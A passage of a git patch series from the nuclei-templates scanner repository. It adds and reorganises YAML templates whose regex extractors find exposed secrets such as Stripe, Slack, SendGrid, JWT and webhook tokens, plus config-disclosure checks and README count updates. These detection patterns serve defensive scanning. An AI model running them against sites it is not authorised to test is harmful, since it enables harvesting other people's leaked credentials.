artifactory-api-token + +info: + name: Artifactory API Token Disclosure + author: Ice3man + severity: info + tags: token,artifactory + +requests: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + part: body + regex: + - '(?:\s|=|:|"|^)AKC[a-zA-Z0-9]{10,}' \ No newline at end of file diff --git a/exposed-tokens/bitly/bitly-secret-key.yaml b/exposed-tokens/bitly/bitly-secret-key.yaml new file mode 100755 index 0000000000..6d9d9884c9 --- /dev/null +++ b/exposed-tokens/bitly/bitly-secret-key.yaml @@ -0,0 +1,18 @@ +id: bitly-secret-key + +info: + name: Bitly Secret Key Disclosure + author: Ice3man + severity: info + tags: token,bitly + +requests: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + part: body + regex: + - 'R_[0-9a-f]{32}' \ No newline at end of file diff --git a/exposed-tokens/cloudinary/cloudinary-credentials.yaml b/exposed-tokens/cloudinary/cloudinary-credentials.yaml new file mode 100755 index 0000000000..1eaedfaccd --- /dev/null +++ b/exposed-tokens/cloudinary/cloudinary-credentials.yaml @@ -0,0 +1,18 @@ +id: cloudinary-credentials + +info: + name: Cloudinary Credentials Disclosure + author: Ice3man + severity: info + tags: token,cloudinary + +requests: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + part: body + regex: + - 'cloudinary://[0-9]+:[A-Za-z0-9\-_\.]+@[A-Za-z0-9\-_\.]+' \ No newline at end of file diff --git a/exposed-tokens/discord/discord-webhook.yaml b/exposed-tokens/discord/discord-webhook.yaml new file mode 100755 index 0000000000..7961d02652 --- /dev/null +++ b/exposed-tokens/discord/discord-webhook.yaml @@ -0,0 +1,18 @@ +id: discord-webhook + +info: + name: Discord Webhook Disclosure + author: Ice3man + severity: info + tags: token,discord + +requests: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + part: body + regex: + - 'https://discordapp\.com/api/webhooks/[0-9]+/[A-Za-z0-9\-]+' \ No newline at end of file diff --git a/exposed-tokens/generic/general-tokens.yaml b/exposed-tokens/generic/general-tokens.yaml index 33df4a717b..d1ef5d886c 100644 --- a/exposed-tokens/generic/general-tokens.yaml +++ b/exposed-tokens/generic/general-tokens.yaml @@ -10,14 +10,9 @@ requests: - method: GET path: - '{{BaseURL}}' + matchers-condition: and matchers: - - type: regex - part: body - regex: - - (K|k)ey(up|down|press) - negative: true - - type: dsl dsl: - regex("TOKEN[\\-|_|A-Z0-9]*(\'|\")?(:|=)(\'|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body),"","")) @@ -26,6 +21,13 @@ requests: - regex("SECRET[\\-|_|A-Z0-9]*(\'|\")?(:|=)(\'|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body),"","")) - regex("AUTHORIZATION[\\-|_|A-Z0-9]*(\'|\")?(:|=)(\'|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body),"","")) - regex("PASSWORD[\\-|_|A-Z0-9]*(\'|\")?(:|=)(\'|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body),"","")) + + - type: regex + part: body + regex: + - (K|k)ey(up|down|press) + negative: true + extractors: - type: regex part: body diff --git a/exposed-tokens/generic/jdbc-connection-string.yaml b/exposed-tokens/generic/jdbc-connection-string.yaml new file mode 100755 index 0000000000..0573b0f11f --- /dev/null +++ b/exposed-tokens/generic/jdbc-connection-string.yaml @@ -0,0 +1,18 @@ +id: jdbc-connection-string + +info: + name: JDBC Connection String Disclosure + author: Ice3man + severity: info + tags: token + +requests: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + part: body + regex: + - 'jdbc:[a-z:]+://[A-Za-z0-9\.\-_:;=/@?,&]+' \ No newline at end of file diff --git a/exposed-tokens/generic/jwt-token.yaml b/exposed-tokens/generic/jwt-token.yaml new file mode 100644 index 0000000000..65d7a8117b --- /dev/null +++ b/exposed-tokens/generic/jwt-token.yaml @@ -0,0 +1,18 @@ +id: jwt-token + +info: + name: JWT Token Disclosure + author: Ice3man + severity: info + tags: token + +requests: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + part: body + regex: + - 'eyJ[a-zA-Z0-9]{10,}\.eyJ[a-zA-Z0-9]{10,}\.[a-zA-Z0-9_\-]{10,}' \ No newline at end of file diff --git a/exposed-tokens/google/google-calendar-link.yaml b/exposed-tokens/google/google-calendar-link.yaml new file mode 100755 index 0000000000..291eccaf20 --- /dev/null +++ b/exposed-tokens/google/google-calendar-link.yaml @@ -0,0 +1,18 @@ +id: google-calendar-link + +info: + name: Google Calendar URI Disclosure + author: Ice3man + severity: info + tags: token,google + +requests: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + part: body + regex: + - 'https://www\.google\.com/calendar/embed\?src=[A-Za-z0-9%@&;=\-_\./]+' \ No newline at end of file diff --git a/exposed-tokens/google/oauth-access-key.yaml b/exposed-tokens/google/oauth-access-key.yaml new file mode 100755 index 0000000000..b20ad27af6 --- /dev/null +++ b/exposed-tokens/google/oauth-access-key.yaml @@ -0,0 +1,18 @@ +id: google-oauth-access-key + +info: + name: Google OAuth Access Key Disclosure + author: Ice3man + severity: info + tags: token + +requests: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + part: body + regex: + - 'ya29\.[0-9A-Za-z\-_]+' \ No newline at end of file diff --git a/exposed-tokens/heroku/heroku-api-key.yaml b/exposed-tokens/heroku/heroku-api-key.yaml new file mode 100755 index 0000000000..93dea264d9 --- /dev/null +++ b/exposed-tokens/heroku/heroku-api-key.yaml @@ -0,0 +1,17 @@ +id: heroku-api-key + +info: + name: Heroku API Key Disclosure + author: Ice3man + severity: info + tags: token + +requests: + - method: GET + path: + - "{{BaseURL}}" + extractors: + - type: regex + part: body + regex: + - '(?i)(?:heroku_api_key|heroku_api_token|heroku_api_secret|heroku_key|heroku_token|heroku_auth|herokuAuth|heroku_auth_token)[\W|\s]{1,10([0-9a-fA-F]{8}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{12}' \ No newline at end of file diff --git a/exposed-tokens/mailchimp/mailchimp-api-key.yaml b/exposed-tokens/mailchimp/mailchimp-api-key.yaml index b7edc4e0a1..4c43da6d84 100644 --- a/exposed-tokens/mailchimp/mailchimp-api-key.yaml +++ b/exposed-tokens/mailchimp/mailchimp-api-key.yaml @@ -3,7 +3,7 @@ id: mailchimp-access-key-value info: name: Mailchimp API Value author: puzzlepeaches - severity: medium + severity: info tags: token,mailchimp requests: diff --git a/exposed-tokens/microsoft/microsoft-teams-webhook.yaml b/exposed-tokens/microsoft/microsoft-teams-webhook.yaml new file mode 100755 index 0000000000..ad8594f363 --- /dev/null +++ b/exposed-tokens/microsoft/microsoft-teams-webhook.yaml @@ -0,0 +1,17 @@ +id: microsoft-teams-webhook + +info: + name: Microsoft Teams Webhook Disclosure + author: Ice3man + severity: info + tags: token + +requests: + - method: GET + path: + - "{{BaseURL}}" + extractors: + - type: regex + part: body + regex: + - 'https://outlook\.office\.com/webhook/[A-Za-z0-9\-@]+/IncomingWebhook/[A-Za-z0-9\-]+/[A-Za-z0-9\-]+' \ No newline at end of file diff --git a/exposed-tokens/newrelic/newrelic-admin-api-key.yaml b/exposed-tokens/newrelic/newrelic-admin-api-key.yaml new file mode 100644 index 0000000000..d2256644a9 --- /dev/null +++ b/exposed-tokens/newrelic/newrelic-admin-api-key.yaml @@ -0,0 +1,17 @@ +id: newrelic-admin-api-key + +info: + name: Admin API Key Disclosure + author: Ice3man + severity: info + tags: token + +requests: + - method: GET + path: + - "{{BaseURL}}" + extractors: + - type: regex + part: body + regex: + - '(?i)NRAA-[a-f0-9]{27}' \ No newline at end of file diff --git a/exposed-tokens/newrelic/newrelic-insights-key.yaml b/exposed-tokens/newrelic/newrelic-insights-key.yaml new file mode 100644 index 0000000000..caa20b9b43 --- /dev/null +++ b/exposed-tokens/newrelic/newrelic-insights-key.yaml @@ -0,0 +1,17 @@ +id: newrelic-insights-key + +info: + name: Insights Keys Disclosure + author: Ice3man + severity: info + tags: token + +requests: + - method: GET + path: + - "{{BaseURL}}" + extractors: + - type: regex + part: body + regex: + - '(?i)NRI(?:I|Q)-[A-Za-z0-9\-_]{32}' \ No newline at end of file diff --git a/exposed-tokens/newrelic/newrelic-rest-api-key.yaml b/exposed-tokens/newrelic/newrelic-rest-api-key.yaml new file mode 100644 index 0000000000..157a9376ef --- /dev/null +++ b/exposed-tokens/newrelic/newrelic-rest-api-key.yaml @@ -0,0 +1,17 @@ +id: newrelic-rest-api-key + +info: + name: REST API Key Disclosure + author: Ice3man + severity: info + tags: token + +requests: + - method: GET + path: + - "{{BaseURL}}" + extractors: + - type: regex + part: body + regex: + - '(?i)NRRA-[a-f0-9]{42}' \ No newline at end of file diff --git a/exposed-tokens/newrelic/newrelic-synthetics-location-key.yaml b/exposed-tokens/newrelic/newrelic-synthetics-location-key.yaml new file mode 100644 index 0000000000..dd5b7f3273 --- /dev/null +++ b/exposed-tokens/newrelic/newrelic-synthetics-location-key.yaml @@ -0,0 +1,17 @@ +id: newrelic-synthetics-location-key + +info: + name: Synthetics Location Key Disclosure + author: Ice3man + severity: info + tags: token + +requests: + - method: GET + path: + - "{{BaseURL}}" + extractors: + - type: regex + part: body + regex: + - '(?i)NRSP-[a-z]{2}[0-9]{2}[a-f0-9]{31}' \ No newline at end of file diff --git a/exposed-tokens/paypal/braintree-access-token.yaml b/exposed-tokens/paypal/braintree-access-token.yaml new file mode 100755 index 0000000000..463875f314 --- /dev/null +++ b/exposed-tokens/paypal/braintree-access-token.yaml @@ -0,0 +1,17 @@ +id: braintree-access-token + +info: + name: PayPal Braintree Access Token Disclosure + author: Ice3man + severity: info + tags: token + +requests: + - method: GET + path: + - "{{BaseURL}}" + extractors: + - type: regex + part: body + regex: + - 'access_token\$production\$[0-9a-z]{16}\$[0-9a-f]{32}' \ No newline at end of file diff --git a/exposed-tokens/picatic/picatic-api-key.yaml b/exposed-tokens/picatic/picatic-api-key.yaml new file mode 100755 index 0000000000..09e0983219 --- /dev/null +++ b/exposed-tokens/picatic/picatic-api-key.yaml @@ -0,0 +1,17 @@ +id: picatic-api-key + +info: + name: Picatic API Key Disclosure + author: Ice3man + severity: info + tags: token + +requests: + - method: GET + path: + - "{{BaseURL}}" + extractors: + - type: regex + part: body + regex: + - 'sk_live_[0-9a-z]{32}' \ No newline at end of file diff --git a/exposed-tokens/sendgrid/sendgrid-api-key.yaml b/exposed-tokens/sendgrid/sendgrid-api-key.yaml new file mode 100644 index 0000000000..13809614c0 --- /dev/null +++ b/exposed-tokens/sendgrid/sendgrid-api-key.yaml @@ -0,0 +1,17 @@ +id: sendgrid-api-key + +info: + name: Sendgrid API Key Disclosure + author: Ice3man + severity: info + tags: token + +requests: + - method: GET + path: + - "{{BaseURL}}" + extractors: + - type: regex + part: body + regex: + - 'SG\.[a-zA-Z0-9-_]{22}\.[a-zA-Z0-9_-]{43}' \ No newline at end of file diff --git a/exposed-tokens/slack/slack-access-token.yaml b/exposed-tokens/slack/slack-access-token.yaml deleted file mode 100644 index a082412fdd..0000000000 --- a/exposed-tokens/slack/slack-access-token.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: slack-access-token - -# xoxp-702234529XXX-688970480XXX-109182524XXXX-87fa5b4d2e62ac5c16fc6ea93bXXXXXX -# xoxb-702234529XXX-1076883857XXX-Ou9aRuvtFZ4DuTsepevXXXXX - -info: - name: Slack access token - author: nadino - severity: medium - tags: token,slack - -requests: - - method: GET - path: - - "{{BaseURL}}" - - extractors: - - type: regex - name: person-token - part: body - regex: - - "xoxp-[0-9A-Za-z\\-]{72}" - - - type: regex - name: bot-token - part: body - regex: - - "xoxb-[0-9A-Za-z\\-]{51}" \ No newline at end of file diff --git a/exposed-tokens/generic/http-username-password.yaml b/exposed-tokens/slack/slack-bot-token.yaml similarity index 53% rename from exposed-tokens/generic/http-username-password.yaml rename to exposed-tokens/slack/slack-bot-token.yaml index bf59102302..9da23472cc 100644 --- a/exposed-tokens/generic/http-username-password.yaml +++ b/exposed-tokens/slack/slack-bot-token.yaml @@ -1,10 +1,10 @@ -id: http-username-password +id: slack-bot-token info: - name: Http usernamme password + name: Slack access token author: nadino severity: info - tags: token + tags: token,slack requests: - method: GET @@ -15,4 +15,4 @@ requests: - type: regex part: body regex: - - '(ftp|ftps|http|https)://[A-Za-z0-9-_:\.~]+(@)' + - "xoxb-[0-9A-Za-z\\-]{51}" \ No newline at end of file diff --git a/exposed-tokens/slack/slack-user-token.yaml b/exposed-tokens/slack/slack-user-token.yaml new file mode 100644 index 0000000000..ab525236a6 --- /dev/null +++ b/exposed-tokens/slack/slack-user-token.yaml @@ -0,0 +1,18 @@ +id: slack-user-token + +info: + name: Slack API-Key Disclosure + author: Ice3man + severity: info + tags: token,slack + +requests: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + part: body + regex: + - "xoxp-[0-9A-Za-z\\-]{72}" \ No newline at end of file diff --git a/exposed-tokens/slack/slack-webhook-token.yaml b/exposed-tokens/slack/slack-webhook-token.yaml new file mode 100755 index 0000000000..e56ad56859 --- /dev/null +++ b/exposed-tokens/slack/slack-webhook-token.yaml @@ -0,0 +1,18 @@ +id: slack-webhook-token + +info: + name: Slack Webhook Disclosure + author: Ice3man + severity: info + tags: token,slack + +requests: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + part: body + regex: + - "https://hooks\\.slack\\.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}" \ No newline at end of file diff --git a/exposed-tokens/sonarqube/sonarqube-token.yaml b/exposed-tokens/sonarqube/sonarqube-token.yaml new file mode 100755 index 0000000000..785b2c6072 --- /dev/null +++ b/exposed-tokens/sonarqube/sonarqube-token.yaml @@ -0,0 +1,17 @@ +id: sonarqube-token + +info: + name: SonarQube Token Disclosure + author: Ice3man + severity: info + tags: token + +requests: + - method: GET + path: + - "{{BaseURL}}" + extractors: + - type: regex + part: body + regex: + - "sonar.{0,50}(?:\"|'|`)?[0-9a-f]{40}(?:\"|'|`)?" \ No newline at end of file diff --git a/exposed-tokens/stripe/stripe-restricted-key.yaml b/exposed-tokens/stripe/stripe-restricted-key.yaml new file mode 100755 index 0000000000..1fbc33bfb6 --- /dev/null +++ b/exposed-tokens/stripe/stripe-restricted-key.yaml @@ -0,0 +1,17 @@ +id: stripe-restricted-key + +info: + name: Stripe Restricted Key Disclosure + author: Ice3man + severity: info + tags: token + +requests: + - method: GET + path: + - "{{BaseURL}}" + extractors: + - type: regex + part: body + regex: + - 'rk_(?:live|test)_[0-9a-zA-Z]{24}' \ No newline at end of file diff --git a/exposed-tokens/stripe/stripe-secret-key.yaml b/exposed-tokens/stripe/stripe-secret-key.yaml new file mode 100755 index 0000000000..fc382d398b --- /dev/null +++ b/exposed-tokens/stripe/stripe-secret-key.yaml @@ -0,0 +1,17 @@ +id: stripe-secret-key + +info: + name: Stripe Secret Key Disclosure + author: Ice3man + severity: info + tags: token + +requests: + - method: GET + path: + - "{{BaseURL}}" + extractors: + - type: regex + part: body + regex: + - 'sk_(?:live|test)_[0-9a-zA-Z]{24}' \ No newline at end of file diff --git a/exposed-tokens/zapier/zapier-webhook-token.yaml b/exposed-tokens/zapier/zapier-webhook-token.yaml new file mode 100755 index 0000000000..9eaa9ab0c8 --- /dev/null +++ b/exposed-tokens/zapier/zapier-webhook-token.yaml @@ -0,0 +1,17 @@ +id: zapier-webhook-token + +info: + name: Zapier Webhook Disclosure + author: Ice3man + severity: info + tags: token + +requests: + - method: GET + path: + - "{{BaseURL}}" + extractors: + - type: regex + part: body + regex: + - 'https://(?:www.)?hooks\.zapier\.com/hooks/catch/[A-Za-z0-9]+/[A-Za-z0-9]+/' \ No newline at end of file diff --git a/exposed-tokens/zoho/zoho-webhook-token.yaml b/exposed-tokens/zoho/zoho-webhook-token.yaml new file mode 100755 index 0000000000..1567d915ab --- /dev/null +++ b/exposed-tokens/zoho/zoho-webhook-token.yaml @@ -0,0 +1,17 @@ +id: zoho-webhook-token + +info: + name: Zoho Webhook Disclosure + author: Ice3man + severity: info + tags: token + +requests: + - method: GET + path: + - "{{BaseURL}}" + extractors: + - type: regex + part: body + regex: + - 'https://creator\.zoho\.com/api/[A-Za-z0-9/\-_\.]+\?authtoken=[A-Za-z0-9]+' \ No newline at end of file From 99307386dbb71462de6dc893686e3911d6f164c9 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 8 Apr 2021 21:17:52 +0530 Subject: [PATCH 24/79] Update slack-user-token.yaml --- exposed-tokens/slack/slack-user-token.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-tokens/slack/slack-user-token.yaml b/exposed-tokens/slack/slack-user-token.yaml index ab525236a6..339411fa38 100644 --- a/exposed-tokens/slack/slack-user-token.yaml +++ b/exposed-tokens/slack/slack-user-token.yaml @@ -1,7 +1,7 @@ id: slack-user-token info: - name: Slack API-Key Disclosure + name: Slack User token disclosure author: Ice3man severity: info tags: token,slack From e954b9d5cf50380e9e3723458bce4bcfeb7a612f Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 8 Apr 2021 21:21:43 +0530 Subject: [PATCH 25/79] Update jwt-token.yaml --- exposed-tokens/generic/jwt-token.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-tokens/generic/jwt-token.yaml b/exposed-tokens/generic/jwt-token.yaml index 65d7a8117b..bdd287142a 100644 --- a/exposed-tokens/generic/jwt-token.yaml +++ b/exposed-tokens/generic/jwt-token.yaml @@ -10,7 +10,7 @@ requests: - method: GET path: - "{{BaseURL}}" - + extractors: - type: regex part: body From ebcc0458fee7effbdbd1958594bf83e30168c548 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 8 Apr 2021 21:23:35 +0530 Subject: [PATCH 26/79] Update s3cmd-config.yaml --- exposed-tokens/amazon/s3cmd-config.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/exposed-tokens/amazon/s3cmd-config.yaml b/exposed-tokens/amazon/s3cmd-config.yaml index 553330f329..1d800ce9b1 100755 --- a/exposed-tokens/amazon/s3cmd-config.yaml +++ b/exposed-tokens/amazon/s3cmd-config.yaml @@ -4,12 +4,13 @@ info: name: S3CMD Configuration Disclosure author: Ice3man severity: info - tags: amazon,config + tags: amazon,config requests: - method: GET path: - "{{BaseURL}}/s3cmd.ini" + matchers: - type: word part: body From d246fb4ad8c506ac5d69d7be7cbd89200e658a07 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 8 Apr 2021 21:39:19 +0530 Subject: [PATCH 27/79] moving files around --- .../amazon => exposures/configs}/s3cmd-config.yaml | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) rename {exposed-tokens/amazon => exposures/configs}/s3cmd-config.yaml (67%) diff --git a/exposed-tokens/amazon/s3cmd-config.yaml b/exposures/configs/s3cmd-config.yaml similarity index 67% rename from exposed-tokens/amazon/s3cmd-config.yaml rename to exposures/configs/s3cmd-config.yaml index 1d800ce9b1..b4af8e090f 100755 --- a/exposed-tokens/amazon/s3cmd-config.yaml +++ b/exposures/configs/s3cmd-config.yaml @@ -4,17 +4,22 @@ info: name: S3CMD Configuration Disclosure author: Ice3man severity: info - tags: amazon,config + tags: amazon,config,exposure requests: - method: GET path: - "{{BaseURL}}/s3cmd.ini" + matchers-condition: and matchers: - type: word part: body words: - '[default]' - 'access_key' - condition: and \ No newline at end of file + condition: and + + - type: status + status: + - 200 \ No newline at end of file From d271fd4d8e9446fa352eaf6ab3d1351603c36b64 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 8 Apr 2021 21:53:33 +0530 Subject: [PATCH 28/79] final changes --- exposed-tokens/heroku/heroku-api-key.yaml | 17 ----------------- 1 file changed, 17 deletions(-) delete mode 100755 exposed-tokens/heroku/heroku-api-key.yaml diff --git a/exposed-tokens/heroku/heroku-api-key.yaml b/exposed-tokens/heroku/heroku-api-key.yaml deleted file mode 100755 index 93dea264d9..0000000000 --- a/exposed-tokens/heroku/heroku-api-key.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: heroku-api-key - -info: - name: Heroku API Key Disclosure - author: Ice3man - severity: info - tags: token - -requests: - - method: GET - path: - - "{{BaseURL}}" - extractors: - - type: regex - part: body - regex: - - '(?i)(?:heroku_api_key|heroku_api_token|heroku_api_secret|heroku_key|heroku_token|heroku_auth|herokuAuth|heroku_auth_token)[\W|\s]{1,10([0-9a-fA-F]{8}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{12}' \ No newline at end of file From 32b7f6e80111e584594c1b1281287d4676a8e671 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 8 Apr 2021 16:26:34 +0000 Subject: [PATCH 29/79] Auto Update README [Thu Apr 8 16:26:34 UTC 2021] :robot: --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index e0281d7bc2..72d2c92faa 100644 --- a/README.md +++ b/README.md @@ -38,12 +38,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | | cves | 266 | vulnerabilities | 120 | exposed-panels | 117 | -| takeovers | 67 | exposures | 66 | technologies | 60 | +| takeovers | 67 | exposures | 67 | technologies | 60 | | misconfiguration | 55 | workflows | 27 | miscellaneous | 20 | -| default-logins | 21 | exposed-tokens | 9 | dns | 8 | +| default-logins | 21 | exposed-tokens | 33 | dns | 8 | | fuzzing | 7 | helpers | 6 | iot | 11 | -**82 directories, 892 files**. +**95 directories, 917 files**. From 521763c1a4b27d7f60ecb72a1e29c70b41e8eac3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 8 Apr 2021 16:39:36 +0000 Subject: [PATCH 30/79] Auto Update README [Thu Apr 8 16:39:36 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 72d2c92faa..b38d5f299a 100644 --- a/README.md +++ b/README.md @@ -38,12 +38,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | | cves | 266 | vulnerabilities | 120 | exposed-panels | 117 | -| takeovers | 67 | exposures | 67 | technologies | 60 | +| takeovers | 67 | exposures | 68 | technologies | 60 | | misconfiguration | 55 | workflows | 27 | miscellaneous | 20 | | default-logins | 21 | exposed-tokens | 33 | dns | 8 | | fuzzing | 7 | helpers | 6 | iot | 11 | -**95 directories, 917 files**. +**95 directories, 918 files**. From f32ed958eea5a4d6bd5450a4a32b977aac39db16 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 8 Apr 2021 22:19:08 +0530 Subject: [PATCH 31/79] Update somfy-login.yaml --- exposed-panels/somfy-login.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/somfy-login.yaml b/exposed-panels/somfy-login.yaml index 9e43ef1ec2..61c85d3773 100644 --- a/exposed-panels/somfy-login.yaml +++ b/exposed-panels/somfy-login.yaml @@ -16,7 +16,7 @@ requests: - type: word words: - Home motion by Somfy - condition: and + - type: status status: - 200 From d3a173053980c592a61fe6b717743f7507e4fdb5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 8 Apr 2021 16:49:48 +0000 Subject: [PATCH 32/79] Auto Update README [Thu Apr 8 16:49:48 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index b38d5f299a..a2c5cad4a3 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 266 | vulnerabilities | 120 | exposed-panels | 117 | +| cves | 266 | vulnerabilities | 120 | exposed-panels | 118 | | takeovers | 67 | exposures | 68 | technologies | 60 | | misconfiguration | 55 | workflows | 27 | miscellaneous | 20 | | default-logins | 21 | exposed-tokens | 33 | dns | 8 | | fuzzing | 7 | helpers | 6 | iot | 11 | -**95 directories, 918 files**. +**95 directories, 919 files**. From 4f2f682cb4631136b3b7a754ba48a2a99c245ad2 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 8 Apr 2021 22:23:50 +0530 Subject: [PATCH 33/79] minor fix --- exposures/configs/coremail-config-disclosure.yaml | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/exposures/configs/coremail-config-disclosure.yaml b/exposures/configs/coremail-config-disclosure.yaml index 394ce246de..ef50811b27 100644 --- a/exposures/configs/coremail-config-disclosure.yaml +++ b/exposures/configs/coremail-config-disclosure.yaml @@ -1,4 +1,5 @@ id: coremail-config-disclosure + info: name: Coremail Config Disclosure author: princechaddha @@ -10,12 +11,17 @@ requests: - method: GET path: - '{{BaseURL}}/mailsms/s?func=ADMIN:appState&dumpConfig=/' + matchers-condition: and matchers: - type: word words: - "" - 'containerDefinitions' + - 'coremail' + - '' + condition: or + - type: status status: - - 302 + - 200 From ef9e95eb96b2b3aa71457d96fca73f1aac0bf039 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 8 Apr 2021 16:55:25 +0000 Subject: [PATCH 34/79] Auto Update README [Thu Apr 8 16:55:25 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index a2c5cad4a3..094a100295 100644 --- a/README.md +++ b/README.md @@ -38,12 +38,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | | cves | 266 | vulnerabilities | 120 | exposed-panels | 118 | -| takeovers | 67 | exposures | 68 | technologies | 60 | +| takeovers | 67 | exposures | 69 | technologies | 60 | | misconfiguration | 55 | workflows | 27 | miscellaneous | 20 | | default-logins | 21 | exposed-tokens | 33 | dns | 8 | | fuzzing | 7 | helpers | 6 | iot | 11 | -**95 directories, 919 files**. +**95 directories, 920 files**. From 3b300d065848894e41aa8a9e4d02bb748ab96eb9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 8 Apr 2021 16:58:22 +0000 Subject: [PATCH 35/79] Auto Update README [Thu Apr 8 16:58:22 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 094a100295..ea76460bcb 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 266 | vulnerabilities | 120 | exposed-panels | 118 | +| cves | 267 | vulnerabilities | 120 | exposed-panels | 118 | | takeovers | 67 | exposures | 69 | technologies | 60 | | misconfiguration | 55 | workflows | 27 | miscellaneous | 20 | | default-logins | 21 | exposed-tokens | 33 | dns | 8 | | fuzzing | 7 | helpers | 6 | iot | 11 | -**95 directories, 920 files**. +**95 directories, 921 files**. From 76bcf58d1bd7d9207b8d90b7d5137a1ff0a96131 Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Thu, 8 Apr 2021 22:55:01 +0530 Subject: [PATCH 36/79] Update google-api-key.yaml --- exposed-tokens/google/google-api-key.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposed-tokens/google/google-api-key.yaml b/exposed-tokens/google/google-api-key.yaml index 96f7b78c72..6d832ebfb4 100644 --- a/exposed-tokens/google/google-api-key.yaml +++ b/exposed-tokens/google/google-api-key.yaml @@ -10,6 +10,7 @@ requests: - method: GET path: - "{{BaseURL}}" + - "{{BaseURL}}/hopfully404" extractors: - type: regex From 275380fc1fdefb3486cef93f5ed272b0f2920336 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 8 Apr 2021 23:47:41 +0530 Subject: [PATCH 37/79] FAQ link update --- README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index ea76460bcb..581d4ef04a 100644 --- a/README.md +++ b/README.md @@ -18,7 +18,8 @@ Nuclei Templates ContributionsDiscussionCommunity • - Join Discord + FAQs • + Join Discord

---- From 5d703c2eb085c46570942aa0b06b9babd3352f32 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 8 Apr 2021 18:18:09 +0000 Subject: [PATCH 38/79] Auto Update README [Thu Apr 8 18:18:09 UTC 2021] :robot: --- README.md | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/README.md b/README.md index 581d4ef04a..ea76460bcb 100644 --- a/README.md +++ b/README.md @@ -18,8 +18,7 @@ Nuclei Templates ContributionsDiscussionCommunity • - FAQs • - Join Discord + Join Discord

